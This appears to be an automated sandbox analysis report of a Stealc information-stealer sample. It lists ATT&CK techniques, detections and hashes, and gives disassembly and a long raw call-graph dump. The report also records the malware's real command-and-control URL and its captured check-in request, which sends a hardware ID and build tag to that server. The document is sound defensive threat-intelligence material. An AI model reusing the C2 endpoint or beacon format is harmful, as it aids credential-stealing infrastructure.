Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.phpj | file.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpf | file.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1565520
                          Start date and time:2024-11-30 04:11:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 58s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 129
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig | 185.215.113.16
WHOLESALECONNECTIONSNL | newtpp.exe | malicious | Xmrig | 185.215.113.66
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
No context
No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946354570205017
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'840'128 bytes
                          MD5:bb0c42d0421512d8f7796f5253543456
                          SHA1:8b3139e22e253adc3b55d8743a7d4cc173aa567d
                          SHA256:29ca807f5372fed46f73a09b357be9a41c7271307d273a20fe9045eeadce65e8
                          SHA512:20b2775045ae808319bd5283e6812ee03a6b96faf7a110b0246e43d8de7132822dd8c0c1df8d0516b7350a0fc5f4b862af30807e3dbc875cfd2bbfefc622934e
                          SSDEEP:49152:iM4IR3PksYn/lXz5lEsNEJqgIY210WiJC:R3PVkA+qqyWi4
                          TLSH:CB8533B5DA752FBBDD45A4B7C75353065BE049438F7449203DE4FBCA082A28FF80A989
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........PE..L.....Hg...........
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xaaa000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x674897E8 [Thu Nov 28 16:18:48 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007F2B9C7F079Ah
                          pslld mm3, qword ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [esi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], cl
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [eax+00000000h], eax
                          add byte ptr [eax], al
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x249000 | 0x16200 | 9c0eb5c4def466a22b998b245364a33c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x1f0 | 0x200 | 32f8c5f2bf901a0cf6786f64ea7c8c97 | False | 0.6328125 | data | 4.887270092054358 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x24c000 | 0x2b5000 | 0x200 | ddc14a5871ca9e27bf49e0746777944b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sqwnkuay | 0x501000 | 0x1a8000 | 0x1a7400 | fdfa38a99028b61b3fd6a8a12ed4e865 | False | 0.9946332324276432 | data | 7.954864550900061 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dlrscmkp | 0x6a9000 | 0x1000 | 0x600 | 73178c9decc2289475a36f1232ecbade | False | 0.60546875 | data | 5.2464103360119365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6aa000 | 0x3000 | 0x2200 | e9f5a87af4a8057cbbf4dec71710c837 | False | 0.05905330882352941 | DOS executable (COM) | 0.7292797376181227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x6a8118 | 0x198 | ASCII text, with CRLF line terminators | | | 0.5833333333333334

DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-30T04:12:02.565183+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2024 04:12:00.606647015 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 30, 2024 04:12:00.726916075 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 30, 2024 04:12:00.726995945 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 30, 2024 04:12:00.732795954 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 30, 2024 04:12:00.852802992 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 30, 2024 04:12:02.105911016 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 30, 2024 04:12:02.106126070 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 30, 2024 04:12:02.113874912 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 30, 2024 04:12:02.234029055 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 30, 2024 04:12:02.565124989 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 30, 2024 04:12:02.565182924 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 30, 2024 04:12:05.750816107 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                          • 185.215.113.206
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 5436 | C:\Users\user\Desktop\file.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Nov 30, 2024 04:12:00.732795954 CET | 90 | OUT | GET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 30, 2024 04:12:02.105911016 CET | 203 | IN | HTTP/1.1 200 OK
                          Date: Sat, 30 Nov 2024 03:12:01 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Nov 30, 2024 04:12:02.113874912 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 34 30 31 30 44 43 35 38 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a
                          Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"DA4010DC58231817704571------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"drum------IIJKJDAFHJDHIEBGCFID--
                          Nov 30, 2024 04:12:02.565124989 CET | 210 | IN | HTTP/1.1 200 OK
                          Date: Sat, 30 Nov 2024 03:12:02 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=



                          Target ID:0
                          Start time:22:11:58
                          Start date:29/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x120000
                          File size:1'840'128 bytes
                          MD5 hash:BB0C42D0421512D8F7796F5253543456
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2040747804.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:4.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:19%
                            Total number of Nodes:1407
                            Total number of Limit Nodes:28
                            [Execution graph: interactive call-graph rendering of 1407 nodes (28 limit nodes); the raw node-and-edge dump is omitted here. Content recoverable from the graph: the main chain starts at 141dc0 and calls 122a90, which repeatedly invokes 124a60 (RtlAllocateHeap, VirtualProtect), then 1465a0 (GetPEB, five LoadLibraryA calls, GetProcAddress); it continues with lstrcpy, GetSystemInfo with an ExitProcess branch, 121030 (GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, GlobalMemoryStatusEx, then ExitProcess or GetUserDefaultLangID), 142ca0 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA), 142c10 (GetProcessHeap, RtlAllocateHeap, GetUserNameA) with an ExitProcess branch, lstrlen/lstrcpy/lstrcat string assembly, OpenEventA with a CloseHandle/Sleep/OpenEventA retry and CreateEventA, 141cf0 (GetSystemTime, 1419f0 string assembly, sscanf, 122a20 SystemTimeToFileTime with an ExitProcess branch), then 1401a0, 122e70 (124a60 repeated), 141740, 140710, 142910 (GetWindowsDirectoryA), 124c50, 138df0 (StrCmpCA) and repeated 121530 / 1260d0 library calls, ending at 142075 (CloseHandle, ExitProcess). Other roots listed in the graph: 143590 (GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx, wsprintfA), 144690 (OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy), 143e90 (GetProcessHeap, RtlAllocateHeap, wsprintfA, lstrcpy), 143300 (GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey), 12100d (GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc, VirtualFree), 142d30 (GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA), 142ea0 (GetUserDefaultLocaleName, LocalAlloc, CharToOemW), 142a23 (lstrcpy) and 1476ae (memset, strlen, ctype).]
28660 124a60 2 API calls 28659->28660 28661 1245fc 28660->28661 28662 124a60 2 API calls 28661->28662 28663 124612 28662->28663 28664 124a60 2 API calls 28663->28664 28665 124628 28664->28665 28666 124a60 2 API calls 28665->28666 28667 12463e 28666->28667 28668 124a60 2 API calls 28667->28668 28669 124657 28668->28669 28670 124a60 2 API calls 28669->28670 28671 12466d 28670->28671 28672 124a60 2 API calls 28671->28672 28673 124683 28672->28673 28674 124a60 2 API calls 28673->28674 28675 124699 28674->28675 28676 124a60 2 API calls 28675->28676 28677 1246af 28676->28677 28678 124a60 2 API calls 28677->28678 28679 1246c5 28678->28679 28680 124a60 2 API calls 28679->28680 28681 1246de 28680->28681 28682 124a60 2 API calls 28681->28682 28683 1246f4 28682->28683 28684 124a60 2 API calls 28683->28684 28685 12470a 28684->28685 28686 124a60 2 API calls 28685->28686 28687 124720 28686->28687 28688 124a60 2 API calls 28687->28688 28689 124736 28688->28689 28690 124a60 2 API calls 28689->28690 28691 12474c 28690->28691 28692 124a60 2 API calls 28691->28692 28693 124765 28692->28693 28694 124a60 2 API calls 28693->28694 28695 12477b 28694->28695 28696 124a60 2 API calls 28695->28696 28697 124791 28696->28697 28698 124a60 2 API calls 28697->28698 28699 1247a7 28698->28699 28700 124a60 2 API calls 28699->28700 28701 1247bd 28700->28701 28702 124a60 2 API calls 28701->28702 28703 1247d3 28702->28703 28704 124a60 2 API calls 28703->28704 28705 1247ec 28704->28705 28706 124a60 2 API calls 28705->28706 28707 124802 28706->28707 28708 124a60 2 API calls 28707->28708 28709 124818 28708->28709 28710 124a60 2 API calls 28709->28710 28711 12482e 28710->28711 28712 124a60 2 API calls 28711->28712 28713 124844 28712->28713 28714 124a60 2 API calls 28713->28714 28715 12485a 28714->28715 28716 124a60 2 API calls 28715->28716 28717 124873 28716->28717 28718 124a60 2 API calls 28717->28718 28719 124889 28718->28719 28720 124a60 2 API calls 28719->28720 28721 12489f 28720->28721 28722 124a60 2 
API calls 28721->28722 28723 1248b5 28722->28723 28724 124a60 2 API calls 28723->28724 28725 1248cb 28724->28725 28726 124a60 2 API calls 28725->28726 28727 1248e1 28726->28727 28728 124a60 2 API calls 28727->28728 28729 1248fa 28728->28729 28730 124a60 2 API calls 28729->28730 28731 124910 28730->28731 28732 124a60 2 API calls 28731->28732 28733 124926 28732->28733 28734 124a60 2 API calls 28733->28734 28735 12493c 28734->28735 28736 124a60 2 API calls 28735->28736 28737 124952 28736->28737 28738 124a60 2 API calls 28737->28738 28739 124968 28738->28739 28740 124a60 2 API calls 28739->28740 28741 124981 28740->28741 28742 124a60 2 API calls 28741->28742 28743 124997 28742->28743 28744 124a60 2 API calls 28743->28744 28745 1249ad 28744->28745 28746 124a60 2 API calls 28745->28746 28747 1249c3 28746->28747 28748 124a60 2 API calls 28747->28748 28749 1249d9 28748->28749 28750 124a60 2 API calls 28749->28750 28751 1249ef 28750->28751 28752 124a60 2 API calls 28751->28752 28753 124a08 28752->28753 28754 124a60 2 API calls 28753->28754 28755 124a1e 28754->28755 28756 124a60 2 API calls 28755->28756 28757 124a34 28756->28757 28758 124a60 2 API calls 28757->28758 28759 124a4a 28758->28759 28760 1468f0 28759->28760 28761 1468fd 43 API calls 28760->28761 28762 146d0e 8 API calls 28760->28762 28761->28762 28763 146da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28762->28763 28764 146e18 28762->28764 28763->28764 28765 146e25 8 API calls 28764->28765 28766 146ee2 28764->28766 28765->28766 28767 146f5f 28766->28767 28768 146eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28766->28768 28769 146f6c 6 API calls 28767->28769 28770 146ff9 28767->28770 28768->28767 28769->28770 28771 147006 12 API calls 28770->28771 28772 147120 28770->28772 28771->28772 28773 14719d 28772->28773 28774 147129 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28772->28774 28775 1471a6 GetProcAddress GetProcAddress 
28773->28775 28776 1471d1 28773->28776 28774->28773 28775->28776 28777 147205 28776->28777 28778 1471da GetProcAddress GetProcAddress 28776->28778 28779 147212 10 API calls 28777->28779 28780 1472fd 28777->28780 28778->28777 28779->28780 28781 147306 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28780->28781 28782 147362 28780->28782 28781->28782 28783 14737e 28782->28783 28784 14736b GetProcAddress 28782->28784 28785 147387 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28783->28785 28786 1406ef 28783->28786 28784->28783 28785->28786 28787 121530 28786->28787 29096 121610 28787->29096 28789 12153b 28790 121555 lstrcpy 28789->28790 28791 12155d 28789->28791 28790->28791 28792 121577 lstrcpy 28791->28792 28793 12157f 28791->28793 28792->28793 28794 121599 lstrcpy 28793->28794 28795 1215a1 28793->28795 28794->28795 28796 121605 28795->28796 28797 1215fd lstrcpy 28795->28797 28798 13f390 lstrlen 28796->28798 28797->28796 28799 13f3c4 28798->28799 28800 13f3d7 lstrlen 28799->28800 28801 13f3cb lstrcpy 28799->28801 28802 13f3e8 28800->28802 28801->28800 28803 13f3fb lstrlen 28802->28803 28804 13f3ef lstrcpy 28802->28804 28805 13f40c 28803->28805 28804->28803 28806 13f413 lstrcpy 28805->28806 28807 13f41f 28805->28807 28806->28807 28808 13f438 lstrcpy 28807->28808 28809 13f444 28807->28809 28808->28809 28810 13f466 lstrcpy 28809->28810 28811 13f472 28809->28811 28810->28811 28812 13f49a lstrcpy 28811->28812 28813 13f4a6 28811->28813 28812->28813 28814 13f4ca lstrcpy 28813->28814 28866 13f4e0 28813->28866 28814->28866 28815 13f4ec lstrlen 28815->28866 28816 13f699 lstrcpy 28816->28866 28817 13f581 lstrcpy 28817->28866 28818 13f5a5 lstrcpy 28818->28866 28819 121530 8 API calls 28819->28866 28820 13f6c8 lstrcpy 28879 13f6d0 28820->28879 28821 13f659 lstrcpy 28821->28866 28822 13f8ef StrCmpCA 28828 14006e 28822->28828 28822->28866 28823 13f77c lstrcpy 28823->28879 28824 13f7f6 StrCmpCA 28824->28822 28824->28879 28825 13fc09 StrCmpCA 28836 14000b 
28825->28836 28825->28866 28826 13f91e lstrlen 28826->28866 28827 13ff2d StrCmpCA 28833 13ff40 Sleep 28827->28833 28842 13ff55 28827->28842 28829 14008d lstrlen 28828->28829 28831 140085 lstrcpy 28828->28831 28835 1400a7 28829->28835 28830 121530 8 API calls 28830->28879 28831->28829 28832 13fc38 lstrlen 28832->28866 28833->28866 28834 13f82a lstrcpy 28834->28879 28840 1400c7 lstrlen 28835->28840 28845 1400bf lstrcpy 28835->28845 28837 14002a lstrlen 28836->28837 28838 140022 lstrcpy 28836->28838 28843 140044 28837->28843 28838->28837 28839 13fa7e lstrcpy 28839->28866 28854 1400e1 28840->28854 28841 13ff74 lstrlen 28856 13ff8e 28841->28856 28842->28841 28846 13ff6c lstrcpy 28842->28846 28849 13ffae lstrlen 28843->28849 28852 14005c lstrcpy 28843->28852 28844 13f94f lstrcpy 28844->28866 28845->28840 28846->28841 28847 13fd98 lstrcpy 28847->28866 28848 13fc69 lstrcpy 28848->28866 28858 13ffc8 28849->28858 28850 13faad lstrcpy 28850->28879 28851 13f971 lstrcpy 28851->28866 28852->28849 28855 140101 28854->28855 28862 1400f9 lstrcpy 28854->28862 28863 121610 4 API calls 28855->28863 28856->28849 28864 13ffa6 lstrcpy 28856->28864 28857 13fdc7 lstrcpy 28857->28879 28867 13ffe8 28858->28867 28868 13ffe0 lstrcpy 28858->28868 28859 13f070 28 API calls 28859->28866 28860 13f878 lstrcpy 28860->28879 28861 13fc8b lstrcpy 28861->28866 28862->28855 28882 13fff3 28863->28882 28864->28849 28865 13f190 35 API calls 28865->28879 28866->28815 28866->28816 28866->28817 28866->28818 28866->28819 28866->28820 28866->28821 28866->28822 28866->28825 28866->28826 28866->28827 28866->28832 28866->28839 28866->28844 28866->28847 28866->28848 28866->28850 28866->28851 28866->28857 28866->28859 28866->28861 28870 13f9c2 lstrcpy 28866->28870 28873 13fcdc lstrcpy 28866->28873 28866->28879 28869 121610 4 API calls 28867->28869 28868->28867 28869->28882 28870->28866 28871 13fb04 lstrcpy 28871->28879 28872 13fb7e StrCmpCA 28872->28825 28872->28879 28873->28866 28874 13fe1e lstrcpy 28874->28879 
